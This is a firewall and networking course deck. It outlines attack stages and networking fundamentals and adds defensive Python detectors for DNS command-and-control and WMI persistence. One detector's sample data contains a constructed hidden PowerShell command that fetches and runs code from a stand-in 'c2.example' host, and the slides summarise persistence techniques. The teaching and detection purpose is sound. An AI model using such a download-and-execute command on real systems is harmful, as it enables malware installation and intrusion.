“Learn networking, but learn it well” (course motto, in Spanish: “Aprende redes, pero aprende bien”)
Multi-vendor Firewall
Cisco ASA, Firepower, Fortinet, Palo Alto, pfSense and OPNsense
Instructor: Lino Quivén
CCSI: 32324
WhatsApp: +528180298242
email: [email protected]
https://mx.linkedin.com/in/lquiven
https://www.youtube.com/c/kalinetworks
https://t.me/networkskills
Oct 21, 2016
Mirai Botnet DDoS Attack on Dyn
“In a relatively short time, we've taken a system
built to resist destruction by nuclear weapons
and made it vulnerable to toasters*.”
Jeff Jarmoc, Salesforce.com Head of Security
*Actually mostly webcams, but toasters are more quotable.
Why Do We Need Next-Gen Security?
What Are the Current Attack Types?
White hat hackers (also known as ethical hackers) are the polar opposite of their black hat counterparts. They use their technical skills to protect the world from bad hackers.
Grey hat hackers’ intentions are often good, but they don’t always take the ethical route with their hacking techniques.
Black hat hackers are the evil guys who want to use their technical skills to defraud and blackmail others.
Red hat hackers are like the pseudo-Robin Hood of the cybersecurity field: they take the wrong path to do the right thing. When they find a black hat hacker, they deploy dangerous cyber attacks against them.
Blue hat hackers are security professionals that work outside of the organization. Companies often invite them to test new software and find security vulnerabilities before releasing it.
Green hat hackers are not aware of the security mechanisms and the inner workings of the web, but they are keen learners and determined (and even desperate) to elevate their position in the hacker community.
Tools Used – By Attackers
Focus on Methodology,
Not Tools!
• Original work by Lockheed Martin
• Inspiration from the military kill chain
• Model describing the structure of an attack
• Note that attackers are not legally bound to follow the exact model ☺…
  • E.g., they may establish persistence before lateral movement…
• Still useful to understand the stages of attacks, instead of focusing on specific exploits
MITRE ATT&CK
Cyber Kill Chain vs MITRE ATT&CK
Reconnaissance
Attack stages (sidebar repeated on each of the following slides): Recon > Gain Foothold (Attack Delivery, Exploitation) > Command & Control > Local Compromise > Lateral Movement > Establish Persistence > Exfiltration
Recon
• Social:
  • Business, organization…
  • Employees
    • Email addresses, organization, friends, interests…
  • Tech forums
  • https://www.exploit-db.com/google-hacking-database/
• Servers, applications, infrastructure
  • Use (automated) scanning to find out about the target’s public servers
    • Operating systems, versions, vulnerabilities
    • Applications, versions, vulnerabilities
Gain Foothold
• Physical attacks
• Attack public web servers
• Exploit client-side vulnerabilities
  • Exploiting bugs in clients
  • Social engineering
    • Get a user to open an attachment or click on a link to run a vulnerable application or plugin
Command and Control (CnC)
What do you think:
• What is the most popular protocol suite used for CnC?
Diagram (Labrats.se lab network): Internet, then the NGFW, then the internal zones Public Servers, Active Directory, Internal Servers, IoT and Clients
Command and Control (CnC; cont.)
• Typically use protocols allowed outbound: HTTP, HTTPS, SMTP, DNS
• If using HTTP, the CnC may still be encrypted at the application level
• 91.3% of malware uses DNS*
• Dynamic DNS circumvents blacklists
• Setting a short TTL (“Fast Flux DNS”) allows changing the IP/host in case it is blocked or taken down
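The indicators on this slide (short TTLs that keep moving a name to new addresses, and DNS used as the carrier itself) can be checked from resolver logs. The Python below is an added example, not code from the course slides: it parses a constructed log (format assumed: time, client, query name, record type, answer, TTL) and reports names that look fast-flux (TTL at or below 300 seconds with four or more distinct A answers) and queries whose leading label is long and high-entropy, the shape of data tunnelled through DNS. The names, addresses and thresholds are all assumptions to tune against your own traffic.

```python
"""Heuristic DNS-based C2 indicators over constructed DNS query logs.

Added example, not from the course slides. Assumed log format, one line per answer:
<time> <client> <qname> <rtype> <answer> <ttl>   ("-" when there is no address answer)
"""
import math
from collections import Counter, defaultdict

# Constructed sample log: names and addresses are made up for the example.
SAMPLE_LOG = """\
10:00:01 10.1.1.5 www.example.com A 93.184.216.34 3600
10:00:05 10.1.1.5 cdn.shop-update.example A 45.10.1.1 60
10:00:10 10.1.1.5 cdn.shop-update.example A 45.10.2.9 60
10:00:15 10.1.1.5 cdn.shop-update.example A 91.7.44.3 60
10:00:20 10.1.1.5 cdn.shop-update.example A 185.20.1.2 60
10:00:25 10.1.1.5 cdn.shop-update.example A 77.8.1.5 60
10:00:30 10.1.1.7 mail.example.com MX - 1800
10:00:31 10.1.1.7 ZGF0YTpzZWNyZXQtZmlsZS0wMDAx.c2.example TXT - 30
10:00:32 10.1.1.7 aGVsbG8gd29ybGQgdGhpcyBpcyBkYXRh.c2.example TXT - 30
"""


def parse_log(text):
    """Turn log lines into dicts; malformed lines are skipped rather than crashing the parser."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 6:
            continue
        ts, client, qname, rtype, answer, ttl = parts
        records.append({"ts": ts, "client": client, "qname": qname.rstrip("."),
                        "rtype": rtype.upper(), "answer": answer, "ttl": int(ttl)})
    return records


def shannon_entropy(s):
    """Bits per character; random-looking (encoded) labels score high, words score low."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def find_fast_flux(records, max_ttl=300, min_ips=4):
    """Names whose low-TTL A answers keep pointing at different addresses."""
    ips = defaultdict(set)
    for r in records:
        if r["rtype"] == "A" and r["ttl"] <= max_ttl:
            ips[r["qname"].lower()].add(r["answer"])
    return {name: sorted(s) for name, s in ips.items() if len(s) >= min_ips}


def find_tunnelling(records, min_label_len=24, min_entropy=3.5):
    """Queries whose first label is long and high-entropy: data encoded into the name."""
    hits = set()
    for r in records:
        label = r["qname"].split(".")[0]
        if len(label) >= min_label_len and shannon_entropy(label) >= min_entropy:
            hits.add(r["qname"])
    return sorted(hits)


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print("fast-flux:", find_fast_flux(recs))
    print("tunnelling:", find_tunnelling(recs))
```

A dynamic-DNS name that moves to a fresh address every minute defeats an IP blacklist, which is why the check is keyed on the name's behaviour rather than its address; a real deployment would whitelist CDNs, which legitimately use low TTLs, before alerting.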
Attackers Want to Become Admins
• Even without admin rights, the attacker can already read/write all files, emails, etc. of the compromised user
• But they may want to move laterally in the network and attack other machines, which needs admin rights to:
  • Install (malicious) software
  • Sniff network traffic with ARP poisoning
  • Read passwords and hashes from memory
Normal user:
  • May read/write assigned files
  • May NOT install software, modify drivers or install a sniffer
Administrator/Superuser:
  • Can do anything on the local machine
  • Install software, modify drivers
  • Install sniffers & keyloggers
  • Read any memory location
Lateral Movement
Objective: take control of other clients, servers, IoTs and the Active Directory Domain Controllers
• Note: in many organizations IoT devices may be the most valuable assets!
  • Healthcare
  • Airports
  • Manufacturing
  • …even a printer may be valuable
• IoT devices often run unpatched versions of Windows XP or older Linux…
  • Sometimes patches or installing security software are not even allowed!
• Often run with default usernames/passwords
Establish Persistence
• Persistence after reboot
  • Upload an executable (exe, DLL, vbs…)
  • Make the executable run after reboot/login/on a schedule
    • Create a service; Registry: Run, RunOnce
    • Startup folder, Scheduled tasks
• File-less persistence (slide callout: “No antivirus will detect this…”; a signature-based antivirus has no file to scan, although EDR tooling that records WMI subscription activity can still see it)
  • Use WMI with an event subscription to execute code after reboot
  • No “file” written to disk, just a modification of a legitimate OS configuration file:
    • %SystemRoot%\System32\wbem\Repository\OBJECTS.DATA
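The WMI subscription persistence described on this slide leaves three objects in the repository: an __EventFilter (the trigger), a consumer (the payload) and a __FilterToConsumerBinding tying them together. Sysmon logs their creation as events 19, 20 and 21, and correlating those three is how a defender sees the “file-less” implant. The Python below is an added example, not course material: the event records are constructed in Sysmon's field layout, and the consumer Type strings and the Consumer/Filter reference format are assumptions to confirm against your Sysmon version.

```python
"""Correlate Sysmon WMI events (IDs 19, 20, 21) into filter -> consumer bindings
and flag the ones that look like boot-time, file-less persistence.

Added example, not from the course slides. Records are constructed in the
WmiEvent field layout; the Type strings ("Command Line", "Script", "Event Log")
and the Consumer/Filter reference format are assumptions to verify against Sysmon.
"""
import re

SAMPLE_EVENTS = [
    # constructed: attacker-style subscription that runs hidden PowerShell 4-5 minutes after boot
    {"EventID": 19, "Operation": "Created", "User": "LAB\\Administrator",
     "EventNamespace": "root\\cimv2", "Name": "UpdaterFilter",
     "Query": ("SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "
               "'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 "
               "AND TargetInstance.SystemUpTime < 325")},
    {"EventID": 20, "Operation": "Created", "User": "LAB\\Administrator",
     "Name": "UpdaterConsumer", "Type": "Command Line",
     "Destination": 'powershell.exe -nop -w hidden -c "iwr http://c2.example/a | iex"'},
    {"EventID": 21, "Operation": "Created", "User": "LAB\\Administrator",
     "Consumer": 'CommandLineEventConsumer.Name="UpdaterConsumer"',
     "Filter": '__EventFilter.Name="UpdaterFilter"'},
    # constructed: the SCM event-log subscription that ships with Windows (benign)
    {"EventID": 19, "Operation": "Created", "User": "NT AUTHORITY\\SYSTEM",
     "EventNamespace": "root\\cimv2", "Name": "SCM Event Log Filter",
     "Query": "select * from MSFT_SCMEventLogEvent"},
    {"EventID": 20, "Operation": "Created", "User": "NT AUTHORITY\\SYSTEM",
     "Name": "SCM Event Log Consumer", "Type": "Event Log", "Destination": "NTEventLogEventConsumer"},
    {"EventID": 21, "Operation": "Created", "User": "NT AUTHORITY\\SYSTEM",
     "Consumer": 'NTEventLogEventConsumer.Name="SCM Event Log Consumer"',
     "Filter": '__EventFilter.Name="SCM Event Log Filter"'},
]

NAME_REF = re.compile(r'Name="([^"]+)"')
BOOT_TRIGGER = re.compile(r"SystemUpTime", re.I)            # "run N seconds after boot" window
LOGON_TRIGGER = re.compile(r"Win32_LogonSession|Win32_LoggedOnUser", re.I)
INTERPRETER = re.compile(r"powershell|cmd\.exe|wscript|cscript|mshta|rundll32|regsvr32", re.I)
EXECUTABLE_TYPES = {"Command Line", "Script"}                 # consumers that run arbitrary code


def _ref_name(ref):
    """'__EventFilter.Name="X"' -> 'X'; returns the raw string if the format is unexpected."""
    m = NAME_REF.search(ref)
    return m.group(1) if m else ref


def correlate(events):
    """Join each ID 21 binding to its ID 19 filter and ID 20 consumer by name."""
    filters = {e["Name"]: e for e in events if e["EventID"] == 19}
    consumers = {e["Name"]: e for e in events if e["EventID"] == 20}
    return [(e, filters.get(_ref_name(e["Filter"])), consumers.get(_ref_name(e["Consumer"])))
            for e in events if e["EventID"] == 21]


def find_suspicious_bindings(events):
    findings = []
    for binding, flt, con in correlate(events):
        reasons = []
        if flt is None or con is None:
            reasons.append("binding references a filter/consumer with no creation event")
        else:
            if con.get("Type") in EXECUTABLE_TYPES:
                reasons.append("executable consumer: " + con["Type"])
            if BOOT_TRIGGER.search(flt["Query"]):
                reasons.append("fires after boot (SystemUpTime window)")
            if LOGON_TRIGGER.search(flt["Query"]):
                reasons.append("fires on logon")
            if INTERPRETER.search(con.get("Destination", "")):
                reasons.append("consumer launches a script interpreter")
        if reasons:
            findings.append({"filter": _ref_name(binding["Filter"]),
                             "consumer": _ref_name(binding["Consumer"]),
                             "user": binding["User"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_bindings(SAMPLE_EVENTS):
        print(f)
```

On a live host the same three objects can be listed with Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding (and __EventFilter, __EventConsumer). The benign SCM binding in the sample is why the logic scores the consumer type and the trigger query instead of alerting on every subscription.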
Exfiltration
• With the domain hashes and/or a Golden Ticket, for example, the attacker can impersonate any domain user and access any file share or web server. From there on, data will leave the network…
Diagram: Hoarding / Defense
Zero-Day Attack
Diagram: attacker and CnC server on the Internet; enterprise network behind the perimeter with an admin node inside
1 Infiltration and backdoor establishment (perimeter, inbound)
2 Reconnaissance and network traversal
3 Exploitation and privilege elevation (admin node)
4 Staging and persistence (repeat 2, 3, 4)
5 Data exfiltration (perimeter, outbound)
Key Point: Integrate Your Defenses
• Avoid silos!
• Cooperation between:
• Security
• Network
• Desktop/Clients
• Active Directory
• IoT
• Training
• …
Agenda
• Cybersecurity Basics
• Firewall in General
• Basic Config (hands on)
• Object and Policies
• PBR
• DMZ
• Cryptography
• VPN site to site (IPsec)
• Clientless VPN
• Syslog
• HA – Active/Passive
Learner Introductions
▪Your name
▪Your company
▪Job responsibilities
▪Skills and knowledge
▪Brief history
▪Objective
Cybersecurity
Cybersecurity Goals
Confidentiality = Protect sensitive data
Integrity = Ensure no unauthorized modifications
Availability = Authorized people can access it
Risk = Vulnerability x Threat (risk factors: assets, vulnerabilities, threats)
The Challenge
• Attackers are skilled and motivated
• Attackers are engineers
• Learn from others, reuse code, or write your
own
• Test before putting in production:
• Will it bypass antivirus?
• Will it bypass IPS?
• Will it bypass NGFW?
• Will it bypass Sandboxing?
Option 1: Hope You Are Secure
Option 2: Validate You Are Secure
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public
Next-Gen Security Infrastructure Must…
PROTECTION: Stay ahead of the evolving threat landscape
VISIBILITY: View the network holistically and heuristically
MITIGATION: Detect and contain after compromise has already occurred
AUTOMATION: Respond quickly with integrated defense systems
Questions ?
Network Basics
Network Device Communication
Without a Rock Solid Foundation the Rest Doesn’t Matter
Reference Models
The OSI Reference Model
PDU = Protocol Data Unit: what each layer hands to the next, i.e. the layer’s own header around the payload received from the layer above
Encapsulation (sending host, top down) and decapsulation (receiving host, bottom up):
Payload (application data)
TCP | UDP (segment/datagram)
IPv4 | IPv6 (packet)
Ethernet or Wireless (frame)
Ethernet Frames
1 bit = 0 or 1
1 nibble = 4 bits (one hexadecimal digit)
1 byte = 8 bits = octet
Ethernet Frame Fields (IEEE 802.3), field sizes in bytes:
Preamble | 7 | 10101010 repeated seven times | frame delimiting
Start of Frame Delimiter | 1 | 10101011 | frame delimiting
Destination Address | 6 | MAC address | addressing
Source Address | 6 | MAC address | addressing
Length/EtherType | 2 | 0x0800 IPv4, 0x0806 ARP, 0x86DD IPv6, etc. | identifies the payload
802.2 Header and Data | 46 to 1500 | the IP packet; 1500 bytes is the Ethernet MTU | payload
Frame Check Sequence | 4 | CRC-32 over the frame | error detection
The data link layer is split into the LLC sublayer (802.2) and the MAC sublayer (802.3).
Purpose of the Data Link Layer
ARP (IP address to MAC address); MAC address table (MAC address to switch port)
Network Device Communication
Virtual LANs & Trunks
Access ports (one VLAN each, frames untagged): access vlan 10, access vlan 20, access vlan 30 on both switches
Trunk between the switches: switchport mode trunk; on the trunk each frame carries an 802.1Q tag with its VLAN ID (10, 20 or 30), so the three VLANs share one link without mixing
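To make the frame fields from the Ethernet slide and the 802.1Q tagging on this one concrete, the Python below is an added example (not course material) that builds an Ethernet II frame, optionally inserts the 4-byte 802.1Q tag between the source MAC and the EtherType, appends a real FCS and parses it back, rejecting frames whose FCS does not match. It also models what an access port and a trunk port do with the parsed frame. The MAC addresses and payloads are constructed values; the preamble and SFD are not modelled because NICs strip them before software sees the frame.

```python
"""Build and parse Ethernet II frames with an optional 802.1Q tag and check the FCS.

Added example, not from the course slides. Sample MACs and payloads are constructed.
"""
import struct
import zlib

ETHERTYPES = {0x0800: "IPv4", 0x0806: "ARP", 0x86DD: "IPv6"}


def mac_to_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_to_str(b):
    return ":".join("%02x" % x for x in b)


def fcs(data):
    # Ethernet's FCS is the same CRC-32 zlib computes, transmitted least-significant byte first
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def build_frame(dst, src, ethertype, payload, vlan=None, pcp=0):
    hdr = mac_to_bytes(dst) + mac_to_bytes(src)
    if vlan is not None:
        tci = ((pcp & 0x7) << 13) | (vlan & 0x0FFF)     # PCP (3 bits) | DEI (1 bit) | VID (12 bits)
        hdr += struct.pack("!HH", 0x8100, tci)            # TPID 0x8100 announces the 802.1Q tag
    hdr += struct.pack("!H", ethertype)
    body = hdr + payload.ljust(46, b"\x00")               # pad up to the 46-byte minimum payload
    return body + fcs(body)


def parse_frame(frame):
    if len(frame) < 64:                                   # 14 header + 46 payload + 4 FCS
        raise ValueError("runt frame (%d bytes)" % len(frame))
    body, trailer = frame[:-4], frame[-4:]
    if fcs(body) != trailer:
        raise ValueError("bad FCS: frame corrupted in transit")
    dst, src = mac_to_str(body[0:6]), mac_to_str(body[6:12])
    etype, off, vlan = struct.unpack("!H", body[12:14])[0], 14, None
    if etype == 0x8100:                                   # tagged: VLAN ID then the real EtherType
        tci, etype = struct.unpack("!HH", body[14:18])
        vlan, off = tci & 0x0FFF, 18
    # values up to 1500 are an 802.3 length (LLC follows); 0x0600 and above are EtherTypes
    kind = "802.3 length %d" % etype if etype <= 1500 else ETHERTYPES.get(etype, "0x%04x" % etype)
    return {"dst": dst, "src": src, "vlan": vlan, "ethertype": etype, "kind": kind, "payload": body[off:]}


def egress(info, port):
    """What a switch port does with a classified frame: an access port carries one VLAN
    untagged, a trunk forwards tagged frames of its allowed VLANs. Untagged frames count
    as the port's native VLAN (1 unless configured)."""
    vid = info["vlan"] if info["vlan"] is not None else port.get("native", 1)
    if port["mode"] == "access":
        return "forward untagged" if vid == port["vlan"] else "drop"
    return "forward tagged" if vid in port["allowed"] else "drop"


if __name__ == "__main__":
    arp = build_frame("ff:ff:ff:ff:ff:ff", "00:11:22:33:44:55", 0x0806, b"\x00\x01\x08\x00", vlan=10)
    print(parse_frame(arp), egress(parse_frame(arp), {"mode": "trunk", "allowed": {10, 20, 30}}))
```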
Routing between VLANs
• Layer 3 Switch
• Router on a Stick
EtherChannel Bundle
• Multiple links bundled into one logical link
Network Device Communication
Layer 3 Forwarding and Local Network Forwarding
Diagram: Router X with the directly connected networks 172.16.1.0/24 and 172.16.2.0/24 on its subinterfaces, a 10.10.0.0/16 side holding 10.10.10.0/24, 10.10.20.0/24 and 10.10.30.0/24, and 192.168.100.0/24 beyond. Example destination: 10.10.30.0/24.
IP Routing Table
Protocol | Network | Exit Interface
Connected | 172.16.1.0/24 | Gi0/1.10
Connected | 172.16.2.0/24 | Gi0/1.20
Learned | 10.10.0.0/16 | Gi0/0
A packet for 10.10.30.0/24 matches the learned 10.10.0.0/16 entry and leaves through Gi0/0.
Static vs Dynamic Routing
Criterion | Dynamic Routing | Static Routing
Configuration complexity | Generally independent of the network size | Increases with network size
Topology changes | Automatically adapts to topology changes | Administrator intervention is required
Scaling | Suitable for simple and complex topologies | Suitable for simple topologies
Security | Less secure | More secure
Resource usage | Uses CPU, memory, link bandwidth | No extra resources needed
Predictability | Route depends on the current topology | Route to destination is always the same
Network Device Communication
IGP or EGP
Diagram: one Autonomous System divided into OSPF areas:
• Area 0 (Backbone Area)
• Area 1, Area X, Area 51, each joined to the backbone by an ABR that sends summary routes
• ASBR: redistributes external routes into the Autonomous System
• Internal routers belong to a single area
ABR = Area Border Router
ASBR = Autonomous System Border Router
DHCP for IPv4
DHCP Client to DHCP Server exchange (DORA):
DHCP Discover (Broadcast)
DHCP Offer (Unicast or Broadcast)
DHCP Request (Broadcast)
DHCP Acknowledge (Unicast or Broadcast)
DHCP Client Configuration received:
• IP Address
• Subnet Mask
• DHCP Server Identifier
• Default Gateway
• DNS Server
• Lease Time
• Extra options
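To show where each item of the client configuration listed above comes from, the Python below (an added example, not course material) builds the DISCOVER and OFFER of that exchange and parses the options back out. The fixed header is RFC 2131's BOOTP layout and the option codes are RFC 2132's (1 subnet mask, 3 router, 6 DNS, 51 lease time, 53 message type, 54 server identifier); the addresses, MAC and transaction ID are constructed sample values. It also shows the rule behind “Offer (Unicast or Broadcast)”: the BROADCAST flag set by the client decides.

```python
"""Build and parse DHCPv4 messages (RFC 2131 header + RFC 2132 options).

Added example, not from the course slides. Sample addresses, MAC and xid are constructed.
"""
import socket
import struct

MAGIC = bytes([99, 130, 83, 99])          # magic cookie right after the 236-byte BOOTP header
HEADER = "!BBBBIHH4s4s4s4s16s64s128s"     # op htype hlen hops xid secs flags ciaddr yiaddr siaddr giaddr chaddr sname file
MSG_TYPES = {1: "DISCOVER", 2: "OFFER", 3: "REQUEST", 5: "ACK", 6: "NAK"}
OPTION_NAMES = {1: "subnet_mask", 3: "router", 6: "dns", 51: "lease_time", 53: "msg_type", 54: "server_id"}


def ip_bytes(*ips):
    return b"".join(socket.inet_aton(ip) for ip in ips)


def build_dhcp(op, msg_type, xid, chaddr, yiaddr="0.0.0.0", broadcast=False, options=()):
    """op=1 BOOTREQUEST (client), op=2 BOOTREPLY (server); options are (code, raw bytes) pairs."""
    flags = 0x8000 if broadcast else 0     # BROADCAST bit: client cannot yet receive unicast IP
    hdr = struct.pack(HEADER, op, 1, 6, 0, xid, 0, flags,
                      ip_bytes("0.0.0.0"), ip_bytes(yiaddr), ip_bytes("0.0.0.0"), ip_bytes("0.0.0.0"),
                      chaddr.ljust(16, b"\x00"), b"\x00" * 64, b"\x00" * 128)
    body = bytes([53, 1, msg_type])        # option 53 (message type) is mandatory
    for code, value in options:
        body += bytes([code, len(value)]) + value
    return hdr + MAGIC + body + bytes([255])   # option 255 = end


def parse_dhcp(pkt):
    f = struct.unpack(HEADER, pkt[:236])
    if pkt[236:240] != MAGIC:
        raise ValueError("missing DHCP magic cookie")
    raw, i = {}, 240
    while i < len(pkt):                    # TLV walk: code, length, value; 0 = pad, 255 = end
        code = pkt[i]
        if code == 255:
            break
        if code == 0:
            i += 1
            continue
        length = pkt[i + 1]
        value = pkt[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated option %d" % code)
        raw[code] = value
        i += 2 + length
    opts = {}
    for code, value in raw.items():
        name = OPTION_NAMES.get(code, "opt%d" % code)
        if code in (1, 3, 54):
            opts[name] = socket.inet_ntoa(value)
        elif code == 6:
            opts[name] = [socket.inet_ntoa(value[k:k + 4]) for k in range(0, len(value), 4)]
        elif code == 51:
            opts[name] = struct.unpack("!I", value)[0]
        elif code == 53:
            opts[name] = MSG_TYPES.get(value[0], value[0])
        else:
            opts[name] = value
    return {"op": f[0], "xid": f[4], "broadcast": bool(f[6] & 0x8000),
            "yiaddr": socket.inet_ntoa(f[8]), "chaddr": f[11][:f[2]].hex(":"),
            "msg_type": opts.get("msg_type"), "options": opts}


def reply_delivery(parsed_request):
    """RFC 2131 4.1: BROADCAST bit set -> server must broadcast OFFER/ACK;
    cleared -> server may unicast to yiaddr and the client's hardware address."""
    return "broadcast" if parsed_request["broadcast"] else "unicast"


def sample_exchange():
    """Constructed DISCOVER/OFFER pair for client 00:11:22:33:44:55 (xid 0x3903F326)."""
    chaddr = bytes.fromhex("001122334455")
    discover = build_dhcp(1, 1, 0x3903F326, chaddr, broadcast=True)
    offer = build_dhcp(2, 2, 0x3903F326, chaddr, yiaddr="192.168.1.100", options=[
        (1, ip_bytes("255.255.255.0")), (3, ip_bytes("192.168.1.1")),
        (6, ip_bytes("192.168.1.1", "8.8.8.8")), (51, struct.pack("!I", 86400)),
        (54, ip_bytes("192.168.1.1"))])
    return parse_dhcp(discover), parse_dhcp(offer)


if __name__ == "__main__":
    d, o = sample_exchange()
    print(d["msg_type"], "reply will be", reply_delivery(d))
    print(o["msg_type"], o["yiaddr"], o["options"])
```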
RFC 1918
“Address Allocation for Private Internets”
CLASS | RFC 1918 Range | CIDR Prefix
A | 10.0.0.0 - 10.255.255.255 | 10.0.0.0/8
B | 172.16.0.0 - 172.31.255.255 | 172.16.0.0/12
C | 192.168.0.0 - 192.168.255.255 | 192.168.0.0/16
Types of IPv4 Addresses
Routing to the Internet (NAT)
Diagram: LAN (RFC 1918 addresses) -> firewall/router doing Route + NAT -> Internet (Public IP)
Route + NAT + Policy: the firewall forwards the packet, translates the private source to its public address, and applies policy on the way
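The routing table slide and the Route + NAT slide describe one forwarding decision, which the Python below walks through as an added example, not course material: longest-prefix match over the slide's routing table, then PAT when the chosen exit is the Internet-facing interface and the source is an RFC 1918 address, and the reverse lookup that lets replies back in. The default route out Gi0/2, the public address 203.0.113.10 (TEST-NET-3) and the policy that private destinations never leave the outside interface are assumptions.

```python
"""Forwarding decision of the slide's router plus PAT on the outside interface.

Added example, not from the course slides. Routing table from the slide; the
default route via Gi0/2, PUBLIC_IP and the outbound policy are assumptions.
"""
import ipaddress

ROUTES = [
    ("connected", "172.16.1.0/24", "Gi0/1.10"),
    ("connected", "172.16.2.0/24", "Gi0/1.20"),
    ("learned",   "10.10.0.0/16",  "Gi0/0"),
    ("static",    "0.0.0.0/0",     "Gi0/2"),   # assumed default route towards the Internet
]
OUTSIDE_IF = "Gi0/2"
PUBLIC_IP = "203.0.113.10"                     # assumed NAT outside address (TEST-NET-3)
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_rfc1918(ip):
    a = ipaddress.ip_address(ip)
    return any(a in n for n in RFC1918)


def lookup(dst, routes=ROUTES):
    """Longest-prefix match: the most specific matching network wins, so the
    default route (/0) is used only when nothing else matches."""
    a = ipaddress.ip_address(dst)
    best = None
    for proto, net, iface in routes:
        n = ipaddress.ip_network(net)
        if a in n and (best is None or n.prefixlen > best[1].prefixlen):
            best = (proto, n, iface)
    return best


class PAT:
    """Port Address Translation: many private sources share one public address."""

    def __init__(self, public_ip, first_port=1024):
        self.public_ip, self.next_port = public_ip, first_port
        self.outbound = {}   # (src_ip, src_port, proto) -> public port
        self.inbound = {}    # (public port, proto) -> (src_ip, src_port)

    def translate_out(self, src_ip, src_port, proto):
        key = (src_ip, src_port, proto)
        if key not in self.outbound:
            self.outbound[key] = self.next_port
            self.inbound[(self.next_port, proto)] = (src_ip, src_port)
            self.next_port += 1
        return self.public_ip, self.outbound[key]

    def translate_in(self, public_port, proto):
        return self.inbound.get((public_port, proto))


def forward(pkt, nat):
    """pkt: dict with src, sport, dst, dport, proto. Returns the decision for an inside packet."""
    route = lookup(pkt["dst"])
    if route is None:
        return {"action": "drop: no route"}
    _, net, iface = route
    out = dict(pkt, action="forward", iface=iface, via=str(net))
    if iface == OUTSIDE_IF:
        if is_rfc1918(pkt["dst"]):
            return {"action": "drop: policy, private destination cannot leave the outside interface"}
        if is_rfc1918(pkt["src"]):
            out["src"], out["sport"] = nat.translate_out(pkt["src"], pkt["sport"], pkt["proto"])
    return out


def receive_from_outside(pkt, nat):
    """Inbound on the outside interface: only replies to an existing translation get in."""
    if pkt["dst"] != nat.public_ip:
        return {"action": "drop: not our public address"}
    entry = nat.translate_in(pkt["dport"], pkt["proto"])
    if entry is None:
        return {"action": "drop: no NAT state for unsolicited inbound connection"}
    src_ip, src_port = entry
    return dict(pkt, dst=src_ip, dport=src_port, action="forward", iface=lookup(src_ip)[2])


if __name__ == "__main__":
    nat = PAT(PUBLIC_IP)
    print(forward({"src": "172.16.1.20", "sport": 51000, "dst": "10.10.30.7", "dport": 443, "proto": "tcp"}, nat))
    print(forward({"src": "172.16.1.20", "sport": 51001, "dst": "93.184.216.34", "dport": 443, "proto": "tcp"}, nat))
```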
TYPE 1 HYPERVISOR (bare metal)
TYPE 2 HYPERVISOR (hosted)
https://github.com/ishare2-org/ishare2-cli
docker pull pnetlab/pnet-wireshark
ishare2 mylabs /opt/unetlab/labs/ all
Questions ?